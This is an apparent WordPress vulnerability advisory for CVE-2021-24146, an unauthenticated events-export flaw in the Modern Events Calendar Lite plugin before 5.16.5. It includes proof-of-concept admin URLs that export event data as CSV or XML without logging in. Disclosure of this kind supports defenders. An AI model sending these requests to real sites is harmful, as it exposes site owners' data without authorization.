Modern Events Calendar Lite < 5.16.5 – Unauthenticated Events Export | CVE 2021-24146 | Plugin Vulnerabilities

Description

The plugin did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example.

Proof of Concept

https://drive.google.com/file/d/1lLEXDyPp4LcKoCOqYS7A-0Yg_pIQD-ND/view?usp=sharing

/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv
/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml

Affects Plugins

modern-events-calendar-lite

Fixed in 5.16.5

References

CVE

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Nguyen Van Khanh - SunCSR (Sun* Cyber Security Research)

Submitter

khanh

Submitter website

http://research.sun-asterisk.com/

Verified

Yes

WPVDB ID

c7b1ebd6-3050-4725-9c87-0ea525f8fecc

Timeline

Publicly Published

2021-01-29 (about 3 years ago)

Added

2021-01-29 (about 3 years ago)

Last Updated

2021-01-31 (about 3 years ago)

Other

Published

Title

Published

2024-02-27

Title

LifterLMS – WordPress LMS Plugin for eLearning < 7.5.2 - Missing Authorization via process_review

Published

2015-07-15

Title

WP Attachment Export < 0.2.4 - Unauthenticated Posts Download

Published

2021-07-12

Title

Frontend File Manager < 18.3 - Unauthenticated Arbitrary Post Deletion

Published

2024-04-26

Title

Analytify < 5.2.4 - Missing Authorization to Unauthenticated Google Analytics Tracking ID Modification

Published

2021-01-28

Title

uListing < 1.7 - Unauthenticated WordPress Options Change